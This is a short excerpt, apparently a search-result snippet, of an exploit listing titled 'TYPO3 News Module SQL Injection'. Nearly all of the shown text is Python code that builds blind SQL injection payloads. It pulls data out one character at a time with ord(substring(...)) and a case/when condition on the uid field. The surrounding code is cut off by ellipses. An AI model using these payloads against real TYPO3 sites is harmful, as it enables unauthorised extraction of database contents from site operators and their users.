Exploit Title: TYPO3 News Module SQL Injection # Vendor Homepage ... condition ) payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position) payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % ( payload, ord(char) ) return payload def ...
↧